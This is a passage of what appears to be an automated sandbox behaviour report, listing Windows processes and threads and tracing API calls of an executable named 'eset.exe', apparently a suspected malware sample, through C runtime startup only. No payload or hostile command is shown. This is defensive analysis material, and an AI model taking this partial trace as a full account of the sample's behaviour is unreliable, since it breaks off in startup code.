[0xa], "NT SERVICE\\TabletInputService" [0xa], "NT SERVICE\\TrkWks" [0xa], "NT SERVICE\\UmRdpService" [0xa], "NT SERVICE\\UxSms" [0xa], "NT SERVICE\\WdiSystemHost" [0xa], "NT SERVICE\\Wlansvc" [0xa], "NT SERVICE\\WPDBusEnum" [0xa], "NT SERVICE\\wudfsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000ba6f" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 155 os_tid = 0x7c0 Thread: id = 156 os_tid = 0x58c Thread: id = 157 os_tid = 0x658 Thread: id = 158 os_tid = 0x584 Thread: id = 159 os_tid = 0x728 Thread: id = 160 os_tid = 0x674 Thread: id = 161 os_tid = 0x65c Thread: id = 162 os_tid = 0x144 Thread: id = 163 os_tid = 0x118 Thread: id = 164 os_tid = 0x3ec Thread: id = 165 os_tid = 0x3e8 Thread: id = 166 os_tid = 0x3e0 Thread: id = 167 os_tid = 0x3dc Thread: id = 168 os_tid = 0x3cc Thread: id = 169 os_tid = 0x3c8 Thread: id = 170 os_tid = 0x388 Thread: id = 171 os_tid = 0x384 Thread: id = 172 os_tid = 0x380 Thread: id = 173 os_tid = 0x37c Thread: id = 174 os_tid = 0x364 Thread: id = 175 os_tid = 0x34c Thread: id = 176 os_tid = 0x338 Thread: id = 180 os_tid = 0x33c Process: id = "11" image_name = "System" filename = "" page_root = "0x187000" os_pid = "0x4" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "kernel_analysis" parent_id = "0" os_parent_pid = "0x0" cmd_line = "" cur_dir = "" os_username = "NT AUTHORITY\\SYSTEM" bitness = "64" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 189 os_tid = 0x8 Thread: id = 190 os_tid = 0xc4 Thread: id = 191 os_tid = 0xc8 Thread: id = 192 os_tid = 0x2c Thread: id = 193 os_tid = 0x44 Thread: id = 194 os_tid = 0x34 Thread: id = 195 os_tid = 0x48 Thread: id = 196 os_tid = 0x94 Thread: id = 197 os_tid = 0xa0 Thread: id = 198 os_tid = 0x38 Thread: id = 199 os_tid = 0x60 Thread: id = 200 os_tid = 0x50 Thread: id = 201 os_tid = 0x3c Thread: id = 202 os_tid = 0xd0 Thread: id = 203 os_tid = 0xc Thread: id = 204 os_tid = 0xbc Thread: id = 205 os_tid = 0xd4 Thread: id = 206 os_tid = 0xd8 Thread: id = 207 os_tid = 0xdc Thread: id = 208 os_tid = 0xe8 Thread: id = 209 os_tid = 0xec Thread: id = 210 os_tid = 0x4c Thread: id = 211 os_tid = 0x68 Thread: id = 212 os_tid = 0x30 Thread: id = 213 os_tid = 0xfc Thread: id = 214 os_tid = 0x100 Thread: id = 215 os_tid = 0x104 Thread: id = 216 os_tid = 0x88 Thread: id = 217 os_tid = 0x90 Thread: id = 218 os_tid = 0x84 Thread: id = 219 os_tid = 0x9c Thread: id = 220 os_tid = 0x108 Thread: id = 221 os_tid = 0x10c Thread: id = 222 os_tid = 0x110 Thread: id = 223 os_tid = 0x128 Thread: id = 224 os_tid = 0x12c Thread: id = 225 os_tid = 0x130 Thread: id = 226 os_tid = 0x134 Thread: id = 227 os_tid = 0x138 Thread: id = 228 os_tid = 0x7c Thread: id = 229 os_tid = 0x174 Thread: id = 230 os_tid = 0xb4 Thread: id = 231 os_tid = 0x6c Thread: id = 232 os_tid = 0x28 Thread: id = 233 os_tid = 0x78 Thread: id = 234 os_tid = 0x26c Thread: id = 235 os_tid = 0x8c Thread: id = 236 os_tid = 0x2e4 Thread: id = 237 os_tid = 0x3b4 Thread: id = 238 os_tid = 0x444 Thread: id = 239 os_tid = 0x45c Thread: id = 240 os_tid = 0x98 Thread: id = 242 os_tid = 0x558 Thread: id = 243 os_tid = 0x448 Thread: id = 244 os_tid = 0x570 Thread: id = 245 os_tid = 0x580 Thread: id = 246 os_tid = 0x61c Thread: id = 247 os_tid = 0x684 Thread: id = 254 os_tid = 0x6c8 Thread: id = 255 os_tid = 0x6d4 Thread: id = 256 os_tid = 0x710 Thread: id = 257 os_tid = 0x71c Thread: id = 258 os_tid = 0x728 Thread: id = 259 os_tid = 0x734 Thread: id = 289 os_tid = 0x73c Thread: id = 291 os_tid = 0x744 Thread: id = 303 os_tid = 0x24 Thread: id = 322 os_tid = 0x64 Thread: id = 323 os_tid = 0x20 Thread: id = 326 os_tid = 0x45c Thread: id = 337 os_tid = 0x54 Thread: id = 338 os_tid = 0xc0 Process: id = "12" image_name = "eset.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\eset.exe" page_root = "0x52f75000" os_pid = "0x524" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "autostart" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eset.exe\" " cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e213" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 241 os_tid = 0x528 [0150.470] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1ef948 | out: lpSystemTimeAsFileTime=0x1ef948*(dwLowDateTime=0xdde17180, dwHighDateTime=0x1d5981b)) [0150.470] GetCurrentThreadId () returned 0x528 [0150.470] GetCurrentProcessId () returned 0x524 [0150.470] QueryPerformanceCounter (in: lpPerformanceCount=0x1ef940 | out: lpPerformanceCount=0x1ef940*=6276853776) returned 1 [0157.183] GetStartupInfoW (in: lpStartupInfo=0x1ef8d8 | out: lpStartupInfo=0x1ef8d8*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eset.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x7763fd35, hStdError=0x776a7daf)) [0157.183] GetProcessHeap () returned 0x450000 [0157.183] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77110000 [0157.184] GetProcAddress (hModule=0x77110000, lpProcName="FlsAlloc") returned 0x77124f2b [0157.184] GetProcAddress (hModule=0x77110000, lpProcName="FlsFree") returned 0x7712359f [0157.184] GetProcAddress (hModule=0x77110000, lpProcName="FlsGetValue") returned 0x77121252 [0157.184] GetProcAddress (hModule=0x77110000, lpProcName="FlsSetValue") returned 0x77124208 [0157.184] GetProcAddress (hModule=0x77110000, lpProcName="InitializeCriticalSectionEx") returned 0x77124d28 [0157.184] GetProcAddress (hModule=0x77110000, lpProcName="CreateEventExW") returned 0x771a410b [0157.184] GetProcAddress (hModule=0x77110000, lpProcName="CreateSemaphoreExW") returned 0x771a4195 [0157.184] GetProcAddress (hModule=0x77110000, lpProcName="SetThreadStackGuarantee") returned 0x7712d31f [0157.184] GetProcAddress (hModule=0x77110000, lpProcName="CreateThreadpoolTimer") returned 0x7713ee7e [0157.184] GetProcAddress (hModule=0x77110000, lpProcName="SetThreadpoolTimer") returned 0x7766441c [0157.184] GetProcAddress (hModule=0x77110000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x7768c50e [0157.184] GetProcAddress (hModule=0x77110000, lpProcName="CloseThreadpoolTimer") returned 0x7768c381 [0157.184] GetProcAddress (hModule=0x77110000, lpProcName="CreateThreadpoolWait") returned 0x7713f088 [0157.184] GetProcAddress (hModule=0x77110000, lpProcName="SetThreadpoolWait") returned 0x776705d7 [0157.184] GetProcAddress (hModule=0x77110000, lpProcName="CloseThreadpoolWait") returned 0x7768ca24 [0157.185] GetProcAddress (hModule=0x77110000, lpProcName="FlushProcessWriteBuffers") returned 0x77640b8c [0157.185] GetProcAddress (hModule=0x77110000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x776ffde8 [0157.185] GetProcAddress (hModule=0x77110000, lpProcName="GetCurrentProcessorNumber") returned 0x77691e1d [0157.185] GetProcAddress (hModule=0x77110000, lpProcName="GetLogicalProcessorInformation") returned 0x771a4761 [0157.185] GetProcAddress (hModule=0x77110000, lpProcName="CreateSymbolicLinkW") returned 0x7719cd11 [0157.185] GetProcAddress (hModule=0x77110000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0157.185] GetProcAddress (hModule=0x77110000, lpProcName="EnumSystemLocalesEx") returned 0x771a424f [0157.185] GetProcAddress (hModule=0x77110000, lpProcName="CompareStringEx") returned 0x771a46b1 [0157.185] GetProcAddress (hModule=0x77110000, lpProcName="GetDateFormatEx") returned 0x771b6676 [0157.185] GetProcAddress (hModule=0x77110000, lpProcName="GetLocaleInfoEx") returned 0x771a4751 [0157.185] GetProcAddress (hModule=0x77110000, lpProcName="GetTimeFormatEx") returned 0x771b65f1 [0157.185] GetProcAddress (hModule=0x77110000, lpProcName="GetUserDefaultLocaleName") returned 0x771a47c1 [0157.185] GetProcAddress (hModule=0x77110000, lpProcName="IsValidLocaleName") returned 0x771a47e1 [0157.185] GetProcAddress (hModule=0x77110000, lpProcName="LCMapStringEx") returned 0x771a47f1 [0157.185] GetProcAddress (hModule=0x77110000, lpProcName="GetCurrentPackageId") returned 0x0 [0157.185] GetProcAddress (hModule=0x77110000, lpProcName="GetTickCount64") returned 0x7713eee0 [0157.185] GetProcAddress (hModule=0x77110000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0157.185] GetProcAddress (hModule=0x77110000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0157.187] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x3bc) returned 0x45ede0 [0157.187] GetCurrentThreadId () returned 0x528 [0157.187] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x18) returned 0x45f1a8 [0157.187] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x800) returned 0x45f1c8 [0157.187] GetStartupInfoW (in: lpStartupInfo=0x1ef8a8 | out: lpStartupInfo=0x1ef8a8*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eset.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xd11cc3, hStdOutput=0xaa15d9da, hStdError=0x0)) [0157.187] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0157.187] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0157.187] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0157.187] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eset.exe\" " [0157.187] GetEnvironmentStringsW () returned 0x45f9d0* [0157.187] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1409, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1409 [0157.187] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x581) returned 0x4604e0 [0157.187] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1409, lpMultiByteStr=0x4604e0, cbMultiByte=1409, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=::=::\\", lpUsedDefaultChar=0x0) returned 1409 [0157.188] FreeEnvironmentStringsW (penv=0x45f9d0) returned 1 [0157.188] GetLastError () returned 0x7f [0157.188] SetLastError (dwErrCode=0x7f) [0157.188] GetLastError () returned 0x7f [0157.188] SetLastError (dwErrCode=0x7f) [0157.188] GetLastError () returned 0x7f [0157.188] SetLastError (dwErrCode=0x7f) [0157.188] GetACP () returned 0x4e4 [0157.188] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x220) returned 0x460a70 [0157.188] GetLastError () returned 0x7f [0157.188] SetLastError (dwErrCode=0x7f) [0157.188] IsValidCodePage (CodePage=0x4e4) returned 1 [0157.188] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x1ef8ac | out: lpCPInfo=0x1ef8ac) returned 1 [0157.188] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x1ef374 | out: lpCPInfo=0x1ef374) returned 1 [0157.188] GetLastError () returned 0x7f [0157.188] SetLastError (dwErrCode=0x7f) [0157.188] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1ef788, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0157.188] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1ef788, cbMultiByte=256, lpWideCharStr=0x1ef0f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0157.188] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x1ef388 | out: lpCharType=0x1ef388) returned 1 [0157.188] GetLastError () returned 0x7f [0157.188] SetLastError (dwErrCode=0x7f) [0157.188] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1ef788, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0157.188] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1ef788, cbMultiByte=256, lpWideCharStr=0x1ef0c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0157.188] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0157.189] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x1eeeb8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0157.189] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x1ef688, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿZØ\x15ªÄø\x1e", lpUsedDefaultChar=0x0) returned 256 [0157.189] GetLastError () returned 0x7f [0157.189] SetLastError (dwErrCode=0x7f) [0157.189] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1ef788, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0157.189] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1ef788, cbMultiByte=256, lpWideCharStr=0x1ef0d8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0157.189] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0157.189] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x1eeec8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0157.189] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x1ef588, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f 